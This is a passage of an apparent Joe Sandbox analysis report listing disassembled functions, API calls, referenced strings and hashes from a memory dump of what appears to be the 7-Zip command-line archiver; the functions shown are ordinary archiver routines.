                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$memmove
                                              • String ID: Internal collision in update action set
                                              • API String ID: 265668421-2378581463
                                              • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                              • Instruction ID: ef054c09467867cf18c226cb687c6833a348a225659d93c84befd959bf9929b7
                                              • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                              • Instruction Fuzzy Hash: 9A41FF332086958EDF34CB1AE45476E7B90E39578CF04822AEF8943B58DB7CD586CB09
                                              APIs
                                              • free.MSVCRT ref: 00486E91
                                                • Part of subcall function 00453518: free.MSVCRT ref: 00453551
                                                • Part of subcall function 00453314: memmove.MSVCRT ref: 00453339
                                              • free.MSVCRT ref: 00486E83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: exe
                                              • API String ID: 1534225298-1801697008
                                              • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                              • Instruction ID: 2ec5e22c7af8edb81a8114eb9be3fc40796ac7a5533c27419f3e8e61e30647b3
                                              • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                              • Instruction Fuzzy Hash: 9931946330094196CA21FF26E44029EA730F7867D9F845217EF9E4776ADF6CC64ACB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ByteStringmemmove
                                              • String ID:
                                              • API String ID: 400576877-0
                                              • Opcode ID: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                              • Instruction ID: 5b2335bc27b92e610720cf94cfdb3a3c557adf7bc330f152d73360043a56d255
                                              • Opcode Fuzzy Hash: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                              • Instruction Fuzzy Hash: D521B773319B4091DB249F52E5503AA6264FB887A4F488227AF9E0B795DF7CCC56C708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$wcscmp
                                              • String ID:
                                              • API String ID: 4021281200-0
                                              • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                              • Instruction ID: 4cc9d5ce341fcaa7eb099d71464e25cff07c63955a9616d6ea600ccd3c7de81f
                                              • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                              • Instruction Fuzzy Hash: 3C21037331064092CB20AE26E5412AA7361E7C5BE8F048327EE6D47794EB7CC94ACB04
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: Unsupported charset:
                                              • API String ID: 1294909896-616772432
                                              • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                              • Instruction ID: b4f52edf084fd41df0828133c9a572eb08918f8c7cd5fb786939af40e13ccd95
                                              • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                              • Instruction Fuzzy Hash: D021B263204A00D2DA20DB19D89029E7721E7C53E9F540327EFAE037A6CF6CC98ECB45
                                              APIs
                                                • Part of subcall function 00457D4C: GetFileAttributesW.KERNELBASE ref: 00457D6E
                                                • Part of subcall function 00457D4C: GetFileAttributesW.KERNEL32 ref: 00457DA5
                                                • Part of subcall function 00457D4C: free.MSVCRT ref: 00457DB2
                                              • DeleteFileW.KERNEL32 ref: 00456D90
                                              • DeleteFileW.KERNEL32 ref: 00456DCA
                                              • free.MSVCRT ref: 00456DDA
                                              • free.MSVCRT ref: 00456DE8
                                                • Part of subcall function 004568A0: SetFileAttributesW.KERNELBASE ref: 004568C7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: File$Attributesfree$Delete
                                              • String ID:
                                              • API String ID: 324319583-0
                                              • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                              • Instruction ID: dd7f807c0935201cfc127dbb558560b4394b891fbf5370fa378b12ab547f83b5
                                              • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                              • Instruction Fuzzy Hash: 7401CC22304A0141CA346F359C513AA53304BC67FAF991B23AD69873E7DE2CCD5EC608
                                              APIs
                                              • GetLastError.KERNEL32 ref: 00462137
                                              • free.MSVCRT ref: 004621BB
                                                • Part of subcall function 00456618: FormatMessageW.KERNEL32 ref: 00456676
                                                • Part of subcall function 00456618: LocalFree.KERNEL32 ref: 00456698
                                                • Part of subcall function 0045362C: memmove.MSVCRT ref: 00453659
                                              • free.MSVCRT ref: 00462182
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                              • String ID: :
                                              • API String ID: 1743135865-3653984579
                                              • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                              • Instruction ID: 17e5a55e2f766992eb82e86d80b0f2ff8e48e0571a8cef9e0f81df8402a74e3d
                                              • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                              • Instruction Fuzzy Hash: A3018653301D0091CA20EF26E85025E6721EBC5BF9F54532BBE5E477B9DE2CCA8AC744
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                              • Instruction ID: 2f10bd62c271d95c0fa21fa18a9e6378527810b20cb9c7f98994e2afa4a3ba8c
                                              • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                              • Instruction Fuzzy Hash: EB012B527206608FD7215B3DAC4036A6294B708BE3F944132FE4ADBB51DB2CCC8E87C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                              • API String ID: 1795875747-932691680
                                              • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                              • Instruction ID: 4724f2ef4eecca55c6d0dfc8d1a96178e5db5ea610af4513f1641d873b8d331f
                                              • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                              • Instruction Fuzzy Hash: BC0180A2341904D6DE18EB25E8803A92761E792749F805537EB0D43625DF3CC8A5C78F
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: DirectoryRemovefree
                                              • String ID:
                                              • API String ID: 736856642-0
                                              • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                              • Instruction ID: 0bc4ea09f55a3172b2678d6ce2488aa1e9bed87e01594241d711bf4cd235b291
                                              • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                              • Instruction Fuzzy Hash: 32F036A730460191D9309F22995133E533497867F6F880377AEA9877A6DE2DC94E9B08
                                              APIs
                                              • _CxxThrowException.MSVCRT ref: 00452F5B
                                                • Part of subcall function 00452130: malloc.MSVCRT(?,?,?,?,00452FDA,?,?,00000000,00000000,0045329F), ref: 00452134
                                                • Part of subcall function 00452130: _CxxThrowException.MSVCRT ref: 0045214F
                                              • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0045302B,?,?,?,?,00453698), ref: 00452F2C
                                              • free.MSVCRT(?,Unsupported switch postfix -stm,00000000,0045302B,?,?,?,?,00453698), ref: 00452F34
                                              Strings
                                              • Unsupported switch postfix -stm, xrefs: 00452EF6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$freemallocmemmove
                                              • String ID: Unsupported switch postfix -stm
                                              • API String ID: 3321538808-3553869907
                                              • Opcode ID: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                              • Instruction ID: 9abbd54667cd015069498235385e9229de7c56c466eaf6baf54d8661a5254ce5
                                              • Opcode Fuzzy Hash: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                              • Instruction Fuzzy Hash: 39F0C27670064486DA28DF4BE58026DB761E7867D4F1480269F8907712CA7DD48A8B08
                                              APIs
                                              • _CxxThrowException.MSVCRT ref: 00452AFD
                                                • Part of subcall function 00452130: malloc.MSVCRT(?,?,?,?,00452FDA,?,?,00000000,00000000,0045329F), ref: 00452134
                                                • Part of subcall function 00452130: _CxxThrowException.MSVCRT ref: 0045214F
                                              • memmove.MSVCRT ref: 00452ACE
                                              • free.MSVCRT ref: 00452AD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$freemallocmemmove
                                              • String ID: (LP-
                                              • API String ID: 3321538808-3833670221
                                              • Opcode ID: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                              • Instruction ID: 45921d3357285c3ccdd573be7bb61702e922b1b857ec9bc3d2a3a15e8e127252
                                              • Opcode Fuzzy Hash: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                              • Instruction Fuzzy Hash: 69F0F07270024586DE28DF4BE98025EB721E7867D8F14C02BDF8903711DA3DC88A8B08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$fputcfree
                                              • String ID:
                                              • API String ID: 3819637083-0
                                              • Opcode ID: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                              • Instruction ID: 6bb16f04ecfe241bd1d6689c5b4d7ca81ec82b1c0248b7a0688fb330816fc19b
                                              • Opcode Fuzzy Hash: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                              • Instruction Fuzzy Hash: 65F044A230090091DA30EF26E94035A6320AB99BF9F044332EFAE43BA5DE2CC5498704
                                              APIs
                                              • memmove.MSVCRT ref: 00493E51
                                                • Part of subcall function 00492B60: CompareFileTime.KERNEL32(?,?,?,00000000,00493E64), ref: 00492BA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CompareFileTimememmove
                                              • String ID: alternate streams$files$streams
                                              • API String ID: 1303509325-806849385
                                              • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                              • Instruction ID: ca51da16ed1c4850ff647ff7d2359c350567468e029269a72e9e7e215b7408b1
                                              • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                              • Instruction Fuzzy Hash: F0F0C89271095962EF24DF26D50579D6751F786BD8FC05023AA0C07E589F7CC396C708
                                              APIs
                                              • FormatMessageW.KERNEL32 ref: 00456676
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              • LocalFree.KERNEL32 ref: 00456698
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: FormatFreeLocalMessagefreememmove
                                              • String ID: Error #
                                              • API String ID: 2451246624-1299485822
                                              • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                              • Instruction ID: 96539d855b47517a0dc8645bfb5172fe9e333dcd48e6226536e9325f7a71f596
                                              • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                              • Instruction Fuzzy Hash: FD21EF7221468096CB20CF1AE44179E77B1E7C5BA9F848226DE8987796DF7CC58CCB14
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: UNC
                                              • API String ID: 0-337201128
                                              • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                              • Instruction ID: aeea29bba608dcdafedcd95afa26e83994693a38a037cd7c8813cbd6eb3d7f6e
                                              • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                              • Instruction Fuzzy Hash: B32127B624064586DB608B66E48476A6360E784B8EF5490278F498B722EB2DCCCEC709
                                              APIs
                                              • fputs.MSVCRT ref: 00490661
                                              • free.MSVCRT ref: 00490680
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$freememset
                                              • String ID: ERROR:
                                              • API String ID: 2276422817-977468659
                                              • Opcode ID: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                              • Instruction ID: 28d5b6228211215bb492e38984ad966dd75b1205434b24ad6eee6f8d8f3b6ab0
                                              • Opcode Fuzzy Hash: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                              • Instruction Fuzzy Hash: C211605230160041CA24EB27EA5536F6320ABC6BE9F48463BAF6B47792DF6CC849C348
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0045B4AA
                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0045B4F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID: Path64
                                              • API String ID: 3660427363-321863482
                                              • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                              • Instruction ID: 67a3d52e83936af26629371afd2679ebb5fdf0c6a3aa13c52b051dcac871bc64
                                              • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                              • Instruction Fuzzy Hash: 05216D7361460497EB14CF25E45476EB3A0F784B84F60902AEF8947B68DB3CC845CF44
                                              APIs
                                              Strings
                                              • Can not open the file as archive, xrefs: 004942D8
                                              • Can not open encrypted archive. Wrong password?, xrefs: 00494297
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                              • API String ID: 1795875747-2399861261
                                              • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                              • Instruction ID: 642c0b2ec1ea24ab94f2f5e217ad0520572d728b3af3ec92f5c9c333af4af385
                                              • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                              • Instruction Fuzzy Hash: 6501DFA2310605A2EE14AF27E94075A1721BB86BCAF549033EE0A47345DE6CC89AC309
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: wcscmp
                                              • String ID: \??\
                                              • API String ID: 3392835482-3047946824
                                              • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                              • Instruction ID: 383f188e613e2900a21cd225032e8995b932521cce1deaebcf2f8c47bc46dbea
                                              • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                              • Instruction Fuzzy Hash: 7EF04F61204544D2CE149B26D99032D1321FB86B8AF905433CF4A87716CF28DCFFC318
                                              APIs
                                              • fputs.MSVCRT ref: 00492011
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
